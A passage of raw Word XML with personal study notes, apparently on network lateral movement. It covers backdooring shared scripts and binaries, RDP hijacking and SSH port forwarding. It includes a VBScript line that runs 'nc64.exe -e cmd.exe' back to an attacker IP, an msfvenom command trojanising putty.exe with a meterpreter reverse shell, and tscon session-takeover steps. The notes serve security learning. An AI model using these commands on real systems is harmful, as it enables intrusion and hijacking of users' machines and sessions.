        <w:t>nc64.exe on the same share</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7024">
        <w:t xml:space="preserve"> and inject the following code in the shared script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D384A" w14:textId="77777777" w:rsidR="006C7024" w:rsidRDefault="006C7024" w:rsidP="006C7024">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="006C7024">
        <w:t>CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\10.10.28.6\myshare\nc64.exe %tmp% &amp; %tmp%\nc64.exe -e cmd.exe &lt;attacker_ip&gt; 1234", 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3557D4F6" w14:textId="3791F813" w:rsidR="00965330" w:rsidRDefault="00965330" w:rsidP="00965330">
      <w:r w:rsidRPr="006C7024">
        <w:t>This will copy nc64.exe from the share to the user's workstation %tmp% directory and send a reverse shell back to the attacker whenever a user opens the shared VBS script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E065EE9" w14:textId="27A090EF" w:rsidR="00965330" w:rsidRDefault="00965330" w:rsidP="00965330">
      <w:r w:rsidRPr="00965330">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00965330">
        <w:t xml:space="preserve"> stands for </w:t>
      </w:r>
      <w:r w:rsidRPr="00965330">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Component Object Model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00965330">
        <w:t xml:space="preserve"> a Microsoft technology that allows different software components (even written in different programming languages) to talk to each other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10485DB2" w14:textId="5A86ACD9" w:rsidR="00965330" w:rsidRPr="00965330" w:rsidRDefault="00965330" w:rsidP="00965330">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00965330">
        <w:t xml:space="preserve">CreateObject is a VBScript function that </w:t>
      </w:r>
      <w:r w:rsidRPr="00965330">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>creates and returns a reference to a COM object</w:t>
      </w:r>
      <w:r w:rsidRPr="00965330">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362869C3" w14:textId="3ABDF0F3" w:rsidR="006C7024" w:rsidRDefault="00965330" w:rsidP="00965330">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00965330">
        <w:t xml:space="preserve">"WScript.Shell" is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00965330">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ProgID (Programmatic Identifier)</w:t>
      </w:r>
      <w:r w:rsidRPr="00965330">
        <w:t xml:space="preserve"> of the object you want</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> this is ProgID is for </w:t>
      </w:r>
      <w:r w:rsidRPr="00965330">
        <w:t>WScript.Shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> COM Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00965330">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C40C50" w14:textId="77777777" w:rsidR="006C7024" w:rsidRPr="00990322" w:rsidRDefault="006C7024" w:rsidP="00990322">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backdooring .exe Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64191D18" w14:textId="77777777" w:rsidR="006C7024" w:rsidRPr="006C7024" w:rsidRDefault="006C7024" w:rsidP="006C7024">
      <w:r w:rsidRPr="006C7024">
        <w:t>If the shared file is a Windows binary, say putty.exe, you can download it from the share and use msfvenom to inject a backdoor into it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00884DD4" w14:textId="77777777" w:rsidR="006C7024" w:rsidRPr="006C7024" w:rsidRDefault="006C7024" w:rsidP="006C7024">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="006C7024">
        <w:t>msfvenom -a x64 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=&lt;attacker_ip&gt; lport=4444 -b "\x00" -f exe -o puttyX.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6702466B" w14:textId="12A7A2BE" w:rsidR="006C7024" w:rsidRDefault="006C7024" w:rsidP="006C7024">
      <w:r w:rsidRPr="006C7024">
        <w:t>The resulting puttyX.exe will execute a reverse_tcp meterpreter payload without the user noticing it. Once the file has been generated, we can replace the executable on the windows share and wait for any connections using the exploit/multi/handler module from Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C12C3" w14:textId="77777777" w:rsidR="006C7024" w:rsidRDefault="006C7024" w:rsidP="006C7024"/>
    <w:p w14:paraId="4049BA4B" w14:textId="77777777" w:rsidR="006C7024" w:rsidRPr="00990322" w:rsidRDefault="006C7024" w:rsidP="00990322">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RDP hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49785C01" w14:textId="4D967021" w:rsidR="006C7024" w:rsidRDefault="006C7024" w:rsidP="006C7024">
      <w:r w:rsidRPr="006C7024">
        <w:t xml:space="preserve">When an administrator uses Remote Desktop to connect to a machine and closes the RDP client instead of logging off, his session will remain open on the server indefinitely. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C7024">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">If you have </w:t>
      </w:r>
      <w:r w:rsidRPr="006C7024">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYSTEM privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7024">
        <w:t xml:space="preserve"> on Windows Server 2016 and earlier, you can take over any existing RDP session without requiring a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B308600" w14:textId="77777777" w:rsidR="0079383F" w:rsidRDefault="0079383F" w:rsidP="004668D1"/>
    <w:p w14:paraId="7880498A" w14:textId="1F15167D" w:rsidR="0079383F" w:rsidRDefault="00FC103B" w:rsidP="00FC103B">
      <w:r w:rsidRPr="00FC103B">
        <w:t>run a cmd.exe as administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF79347" w14:textId="61F837BA" w:rsidR="00FC103B" w:rsidRPr="00FC103B" w:rsidRDefault="00DF6B70" w:rsidP="00DF6B70">
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6B70">
        <w:t xml:space="preserve">scalate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF6B70">
        <w:t>privileges:</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC103B" w:rsidRPr="00FC103B">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>PsExec64.exe -s cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569C4CDB" w14:textId="76D8790B" w:rsidR="00FC103B" w:rsidRDefault="00FC103B" w:rsidP="00DF6B70">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FC103B">
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC103B">
        <w:t xml:space="preserve"> the existing sessions on a server</w:t>
      </w:r>
      <w:r w:rsidR="00DF6B70">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF6B70" w:rsidRPr="00DF6B70">
        <w:t>List Existing Sessions:</w:t>
      </w:r>
      <w:r w:rsidR="00DF6B70">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF6B70" w:rsidRPr="00DF6B70">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>query user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B29E868" w14:textId="77777777" w:rsidR="00DF6B70" w:rsidRPr="00DF6B70" w:rsidRDefault="00DF6B70" w:rsidP="00DF6B70">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF6B70">
        <w:t>C:\&gt; query user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C5CCAC" w14:textId="77777777" w:rsidR="00DF6B70" w:rsidRPr="00DF6B70" w:rsidRDefault="00DF6B70" w:rsidP="00DF6B70">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF6B70">
        <w:t xml:space="preserve"> USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C49DC18" w14:textId="77777777" w:rsidR="00DF6B70" w:rsidRPr="00DF6B70" w:rsidRDefault="00DF6B70" w:rsidP="00DF6B70">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF6B70">
        <w:t>&gt;administrator         rdp-tcp#6           2  Active          .  4/1/2022 4:09 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA0825" w14:textId="1AB0D846" w:rsidR="0079383F" w:rsidRDefault="00DF6B70" w:rsidP="00DF6B70">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF6B70">
        <w:t xml:space="preserve"> luke                                    3  Disc          </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6B70">
        <w:t>. 4/6/2022 6:51</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6B70">
        <w:t>AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDEDE94" w14:textId="019C714E" w:rsidR="00DF6B70" w:rsidRDefault="00DF6B70" w:rsidP="007214B6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF6B70">
        <w:t xml:space="preserve">connect to a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Disconnected </w:t>
      </w:r>
      <w:r w:rsidR="007214B6" w:rsidRPr="007214B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>Disc</w:t>
      </w:r>
      <w:r w:rsidR="007214B6" w:rsidRPr="007214B6">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> state </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">session:  </w:t>
      </w:r>
      <w:r w:rsidR="008744FF">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>ts</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6B70">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>con</w:t>
      </w:r>
      <w:r w:rsidR="008744FF">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6B70">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 /dest:rdp-tcp#6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262C3405" w14:textId="0A381D22" w:rsidR="008744FF" w:rsidRPr="00DF6B70" w:rsidRDefault="008744FF" w:rsidP="008744FF">
      <w:r w:rsidRPr="008744FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tscon</w:t>
      </w:r>
      <w:r w:rsidRPr="008744FF">
        <w:t xml:space="preserve"> is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="008744FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>transfer control of a remote session to the local console</w:t>
      </w:r>
      <w:r w:rsidRPr="008744FF">
        <w:t xml:space="preserve"> — like switching users or ending a remote session </w:t>
      </w:r>
      <w:r w:rsidRPr="008744FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>without logging out</w:t>
      </w:r>
      <w:r w:rsidRPr="008744FF">
        <w:t xml:space="preserve"> the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746683CD" w14:textId="39A3869A" w:rsidR="00DF6B70" w:rsidRPr="00262416" w:rsidRDefault="00DF6B70" w:rsidP="00DF6B70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00262416">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;SessionID&gt; or &lt;SessionName&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00262416">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Specifies the session ID or name you want to connect to.</w:t>
      </w:r>
      <w:r w:rsidRPr="00262416">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDB3454" w14:textId="56439786" w:rsidR="00DF6B70" w:rsidRPr="00262416" w:rsidRDefault="00DF6B70" w:rsidP="00DF6B70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00262416">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/dest:&lt;SessionName&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00262416">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Specifies the current session that will be disconnected when you connect to the new session.</w:t>
      </w:r>
      <w:r w:rsidRPr="00262416">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00262416">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Microsoft Learn</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64809FEE" w14:textId="77777777" w:rsidR="00262416" w:rsidRDefault="00166925" w:rsidP="00262416">
      <w:r w:rsidRPr="00166925">
        <w:t>must have SYSTEM-level privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD20E00" w14:textId="753A9C07" w:rsidR="00262416" w:rsidRDefault="00262416" w:rsidP="00262416">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00262416">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250AA0EB" w14:textId="37BBB1F1" w:rsidR="00977452" w:rsidRPr="00977452" w:rsidRDefault="00977452" w:rsidP="00977452">
      <w:r>
        <w:t xml:space="preserve">Note: In ssh command: the initiator that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the command is the Local or the Client and the remote machine is the Remote or Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DC348" w14:textId="77777777" w:rsidR="00BF1F04" w:rsidRPr="00BF1F04" w:rsidRDefault="00BF1F04" w:rsidP="00BF1F04">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF1F04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH Tunnelling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDB3041" w14:textId="62D73A2E" w:rsidR="00262416" w:rsidRDefault="00D55A98" w:rsidP="00D55A98">
      <w:r w:rsidRPr="00D55A98">
        <w:t>SSH port forwarding is a technique used to securely tunnel network traffic (such as web traffic, database connections) through an SSH (Secure Shell) connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39977C76" w14:textId="77777777" w:rsidR="00BA22AE" w:rsidRDefault="00BA22AE" w:rsidP="00D55A98"/>
    <w:p w14:paraId="5E2E3004" w14:textId="548E290E" w:rsidR="00BF7996" w:rsidRDefault="00BF7996" w:rsidP="00BF7996">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7996">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local Port Forwarding (L &gt; R)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AE83CE" w14:textId="7614C368" w:rsidR="00BF7996" w:rsidRPr="00BF7996" w:rsidRDefault="00BF7996" w:rsidP="00BF7996">
      <w:r w:rsidRPr="00BF7996">
        <w:t>forward a port on your local machine to a port on a remote machine (usually over a secure SSH connection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D266C7E" w14:textId="229072B4" w:rsidR="00BF7996" w:rsidRDefault="00BF7996" w:rsidP="00BF7996">
      <w:r w:rsidRPr="00BF7996">
        <w:t>Used when we want to access a service on a remote machine (like a database or web server) that is normally inaccessible to the local machine due to firewalls or network restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575E362E" w14:textId="4075A26C" w:rsidR="00ED6321" w:rsidRPr="00ED6321" w:rsidRDefault="00ED6321" w:rsidP="00ED6321">
      <w:pPr>
        <w:rPr>
          <w:color w:val="77206D" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED6321">
        <w:rPr>
          <w:color w:val="77206D" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Its’ like telling SSH: “Hey SSH, I’ll open a port </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6321">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="77206D" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>locally</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6321">
        <w:rPr>
          <w:color w:val="77206D" w:themeColor="accent5" w:themeShade="BF"/>
        </w:rPr>
        <w:t>, and if I send data there, forward it through the SSH tunnel and out the other side to the internal resource.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6868C5" w14:textId="09E04C94" w:rsidR="00262416" w:rsidRDefault="00BF7996" w:rsidP="00BF7996">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7996">
        <w:t>ssh -L local_port:remote_host:remote_port user@ssh_server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769B05A4" w14:textId="0E9BADFD" w:rsidR="00BA22AE" w:rsidRDefault="00BF7996" w:rsidP="00BA22AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7996">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>local_port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7996">
        <w:t xml:space="preserve"> the port on your local machine that you'll connect to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and when connect to it the connection will be forwarded to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7996">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>remote_host:remoteport</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> through the SSH connection to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7996">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>ssh_server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7996">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7996">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A09A90F" w14:textId="5B578FB6" w:rsidR="00BF7996" w:rsidRDefault="00BF7996" w:rsidP="00A06D4D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7996">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>This command</w:t>
      </w:r>
      <w:r w:rsidR="00BA22AE">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> on my pc</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF7996">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: tell my pc if a connection occure to you on local_port forward it to the remote_host on remote port through our ssh connectoin with ssh server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CAA156" w14:textId="5A357EC8" w:rsidR="007753A5" w:rsidRDefault="007753A5" w:rsidP="007753A5">
      <w:r>
        <w:t>More Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F45C6A" w14:textId="3463E957" w:rsidR="007753A5" w:rsidRDefault="007753A5" w:rsidP="007753A5">
      <w:r>
        <w:t xml:space="preserve">SSH_server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>does not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> connect back to your local port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053BAB48" w14:textId="372AFD62" w:rsidR="007753A5" w:rsidRDefault="00531CE1" w:rsidP="00531CE1">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00531CE1">
        <w:t>ssh -L 8080:serverB:80 user@serverA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F346F1" w14:textId="3B2D23A5" w:rsidR="00531CE1" w:rsidRPr="00531CE1" w:rsidRDefault="00531CE1" w:rsidP="00531CE1">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00531CE1">
        <w:t>By this command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C551EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="00C551EC" w:rsidRPr="00C551EC">
        <w:t xml:space="preserve">attack-pc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00531CE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH client</w:t>
      </w:r>
      <w:r w:rsidRPr="00531CE1">
        <w:t xml:space="preserve"> (on your local machine) does two things:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F55CD9" w14:textId="77777777" w:rsidR="00531CE1" w:rsidRPr="00531CE1" w:rsidRDefault="00531CE1" w:rsidP="00531CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00531CE1">
        <w:t xml:space="preserve">Establishes an SSH connection </w:t>
      </w:r>
      <w:r w:rsidRPr="00531CE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>to server A</w:t>
      </w:r>
      <w:r w:rsidRPr="00531CE1">
        <w:t xml:space="preserve"> on port 22 (or whatever SSH port).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F7CDBF" w14:textId="77777777" w:rsidR="00531CE1" w:rsidRDefault="00531CE1" w:rsidP="00531CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00531CE1">
        <w:t xml:space="preserve">Starts listening </w:t>
      </w:r>
      <w:r w:rsidRPr="00531CE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>locally</w:t>
      </w:r>
      <w:r w:rsidRPr="00531CE1">
        <w:t xml:space="preserve"> on localhost:8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAF5196" w14:textId="076A7C1A" w:rsidR="00531CE1" w:rsidRDefault="00531CE1" w:rsidP="00531CE1">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>When there is any connection</w:t>
      </w:r>
      <w:r w:rsidR="00C551EC">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C551EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>localhost:8080</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (from browser or curl or </w:t>
      </w:r>
      <w:r w:rsidR="00C551EC">
        <w:t xml:space="preserve">external device or </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">so on) it hit the </w:t>
      </w:r>
      <w:r w:rsidRPr="00531CE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ssh_client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on my localhost and </w:t>
      </w:r>
      <w:r w:rsidRPr="00531CE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ssh_client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00531CE1">
        <w:t xml:space="preserve">wraps the request in encryption and sends it </w:t>
      </w:r>
      <w:r w:rsidRPr="00531CE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>through the existing SSH connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00531CE1">
        <w:t xml:space="preserve"> to server A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235C516B" w14:textId="53D9AA07" w:rsidR="00531CE1" w:rsidRPr="00531CE1" w:rsidRDefault="00531CE1" w:rsidP="00531CE1">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00531CE1">
        <w:t xml:space="preserve">Server A then </w:t>
      </w:r>
      <w:r w:rsidRPr="00531CE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>makes a new TCP connection to serverB:80</w:t>
      </w:r>
      <w:r w:rsidRPr="00531CE1">
        <w:t xml:space="preserve"> on your behalf.</w:t>
      </w:r>
    </w:p>
